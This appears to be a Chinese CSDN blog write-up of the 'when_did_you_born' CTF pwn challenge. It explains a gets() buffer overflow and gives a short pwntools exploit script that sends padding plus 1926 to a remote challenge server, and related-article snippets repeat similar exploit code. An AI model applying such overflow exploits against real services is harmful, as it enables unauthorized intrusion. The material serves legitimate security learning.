sctf-when_did_you_born

最新推荐文章于 2020-11-12 18:49:30 发布
最新推荐文章于 2020-11-12 18:49:30 发布
阅读量730 收藏
点赞数
分类专栏: Hacker之路 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcl2840072208/article/details/95231429
版权

IDA :
在这里插入图片描述

思路:
输入v5 (不等于1926),, 通过v4 覆盖到v5 使其等于1926.
在这里插入图片描述
可以看出偏移为2

from pwn import *
#sh = process('./when_did_you_born')
sh = remote('111.198.29.45',52538)
sh.recv()
sh.sendline('1925')
payload = 'AAaaaaaa'+p32(1926)
sh.recv()
sh.sendline(payload)
a=sh.recv()
print a
sh.interactive()
heri2
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python3的pwn用法——when_did_you_born题解
Little_Small_Joze的博客
03-11 1669
检测截图 file when_did_you_born checksec when_did_you_born 我承认看到金丝雀+NX有那么一点点不开心,但是不影响。 反编译程序 根据上一步的file查看到它是64-bits的ELF文件,所以64-bits的IDA打开它,反编译找到主函数F5查看源代码。 __int64 __fastcall main(int a1, char **a2, char **a3) { __int64 result; // rax char v4[8]; // [rs
[CTF-PWN]攻防世界新手村-when_did_you_born[wp]
murongxuege的博客
09-29 612
事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候,从头到尾刷一遍题,总结思路。 题目分析 开启场景后,服务端会开启对应的端口,并在端口上部署和附件相同的ELF二进制可执行文件,我们要做的就是下载附件并在本地进行反汇编,反编译等操作分析程序漏洞,从而利用漏洞获取题目的flag。 从描述中可以看出当前程序是要进行年龄的输入操作的,有输入操作,还是在新手村,那么大概率是gets()等C函数输入漏洞,进一步猜测是普通的内存地址覆盖的题。 che
攻防世界when_did_you_born
Deeeelete的博客
11-12 186
题目:when_did_you_born 拖进pe查看文件详情 checksec查看 无PIE,堆栈不可执行,栈保护 运行跑一遍逻辑 进64位IDA调试 f5反编译main函数 得到源码 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { __int64 result; // rax@4 __int64 v4; // rdx@9 char v5; // [sp+0h] [bp-20h]@5 unsig
when_did_you_born [XCTF-PWN]CTF writeup系列3
重新启程
12-19 419
题目地址:when_did_you_born 先检查一下保护机制 root@mypwn:/ctf/work/python# checksec 24937e95ca4744818feebe82ab96902d [*] '/ctf/work/python/24937e95ca4744818feebe82ab96902d' Arch: amd64-64-little ...
pwn when_did_you_born
doudoudedi
06-08 509
今天被一道被一道web给虐暴了自闭中~~~~~ 所以我做到pwn来缓缓 用ida打开只要v5=1926 就可以看flag 但按照前面的逻辑不可以等于所以 就涉及到了溢出 gets()这个很普遍了吧 直接算出偏移为8 然后就上exp咯 from pwn import * p=remote('111.198.29.45',56377) payload='a'*8+p64(1926) p.recvunt...
SEBA\SCTF-DL3手册(英语版)
12-02
韩国SEBA\SCTF-DL3流量计手册
SCTF2020:SCTF2020
04-01
SCTF2020:一场聚焦Java技术的网络安全挑战】 SCTF2020,全称为“SCTF2020网络安全技术挑战赛”,是一个专注于信息技术安全领域的年度竞赛,尤其强调了Java技术的应用。这个比赛旨在检验参赛者在Java编程、网络...
sctf2018-NginxSecret:sctf2018-Nginx秘密
05-10
readme开启或者关闭docker环境docker-compose builddocker-compose up -ddocker-compose down手动开启botbot.py需要手动开启,登陆admin B3P#9!3J%#1dFp%&。拿到cookie加在py中对应的地方即可。
大豆C2H2型锌指蛋白基因SCTF-1的克隆及功能研究
01-03
大豆C2H2型锌指蛋白基因SCTF-1的克隆及功能研究,宋冰,王丕武,锌指蛋白是转录因子的一种,对真核生物的生长发育及逆境胁迫的耐受能力都有着重要影响。文章从大豆中克隆了一个新的C2H2型锌指蛋�
sctf2018-zhuanxv:SCTF2018-Zhuanxv Docker(源码)&Writeup
05-11
sctf2018-zhuanxv 部署 启动 ./start_up.sh 停止 docker-compose down WP 第一步:信息收集 信息收集,发现github上遗留的说明。 根据提供的url进入登录地址,发现用户名密码已经无法登陆 第二步:下载源码 查看网页...
SCTF2020 官方Write-up.pdf
07-08
SCTF的官方wp!SCTF的官方wp!如有侵权请私信撤回谢谢。
cgctf when_did_you_born 栈溢出简单利用
ditto的博客
12-22 2544
拿到题目,先checksec下,看下防护措施: 没有开启PIE。 直接放到IDA里看下: 有些变量名为了方便看,我已经修改过了。图中箭头处即是溢出点。 分析下 第一次输入overflowme,如果等于1926就会退出,但是想要拿到flag,就需要overflowme的值为1926,那就很明显了,第一次输入的时候随便输个数只要不是1926就行,第二次输入v4 这个数组的时候,利用缓冲区溢出,将o...
when_did_you_born(xctf)
weixin_43868725的博客
05-06 206
0x0 程序保护和流程 保护: 流程: 分析主要程序逻辑可知,要想获得flag必须让v5等于1926但是第一次输入时v5不能等于1925。但是我们可以通过gets(&v4)将v5的值覆盖成1926。 0x1 利用过程 v4变量距离rsp的偏移为0x0,v5变量距离rsp的变量为0x8,所以当v4=‘a’*8+p64(1926)时就可以获得flag。 0x2 exp from pwn i...
XCTF - pwn when_did_you_born - WP
weixin_30340745的博客
09-12 191
1.先拉进虚拟机运行一下 2.检查一下文件格式,发现是64位文件,然后这个文件开了 canary 和 Nx 保护,但是影响不大。 3.用 ida64 反编译查看一下,进入main函数。不难发现,当进入 else 分支后使得 v6 得 1926 即可得到 flag。 4.现在的问题是将第一次 v6 不得 1926 而第二次检...
CTF|入门题目when_did_you_born解题思路以个人总结
skyattractive的博客
05-31 726
CTF|入门题目when_did_you_born解题思路以个人总结 解题思路 拿到题目我们放入ubuntu里面通过file born(此处born是文件名) 来查看文件信息 得到信息: ELF:文件elf格式 64-bit:64位文件 LSB:文件小端序(什么是小端序个人总结会写) executable:顾名思义,可执行的文件 接下我们运行下文件./born 并过一遍文件流程 比较简单,输入生日birth 输入名字name 输出文字 将文件拖入反编译工具IDA F5 查看伪代码 得到伪代码后需要特别关
18.9.16 PWN----When Did You Born
qq_42192672的博客
09-16 1273
最近想学一下pwn的基础 这个是南邮CTF平台的PWN的第一题把算是(老平台的唯一一道) 听大神说pwn很多文件都采取elf头,所以推荐在linux下食用 直接拖进IDA,分析一下 看下来是利用缓冲区溢出吧,先输入v4字符串覆盖空间,然后再给v5赋值1926就好了,试试看,从ebp的偏移可以看出来v4距离v5需要覆盖8个字节 但是有个坑就是刚开始What's your birth那里...
when_did_you_born 栈溢出简单利用
zyh18851473527的博客
08-05 580
直接放到IDA里看下: 显而易见只要v5=1926,就可以看flag。但按照前面的逻辑不可以等于所以 就涉及到了溢出。gets函数溢出,这道题关键v5一开始不为1926,后面必须是1926,所以通过栈可以知道,用v4覆盖v5 下面利用缓冲区溢出,先输入v4字符串覆盖空间,然后再给v5赋值1926就好了,试试看,从ebp的偏移可以看出来v4距离v5需要覆盖8个字节 这样就得到flag啦 ...
攻防世界pwn新手练习(when_did_you_born
BurYiA的博客
09-16 565
when_did_you_born ok 多余的话就不继续累赘了昂,直接上手 程序同上次一样开了NX(堆栈不可执行)和CANNARY(栈保护)
Nepire的pwn入门学习之旅——(一)
Nepire的博客
02-03 2146
欢迎大家来到Nepire的pwn入门,本系列主要是通过CTF中pwn题的各种类型的解题过程来学习pwn相关的知识,让我们在pwn的世界沦陷吧呜喵~ 这次我要讲的是南邮CTF里的pwn50—When did you born?这是我最初做出来的几题pwn之一,算是很基础的pwn题,,所以让我们从这题开始入门吧~ 题目 nc ctf.acdxvfsvd.net 1926 ...
./pwn1_sctf_2016: error while loading shared libraries: libstdc++.so.6: cannot open shared object file: No such file or directory
最新发布
09-02
这个错误通常发生在缺少 libstdc++.so.6 库文件时。解决这个问题的方法是安装 libstdc++ 库。你可以尝试使用以下命令来安装它: 对于 Ubuntu 或 Debian 系统: ``` sudo apt-get install libstdc++6 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值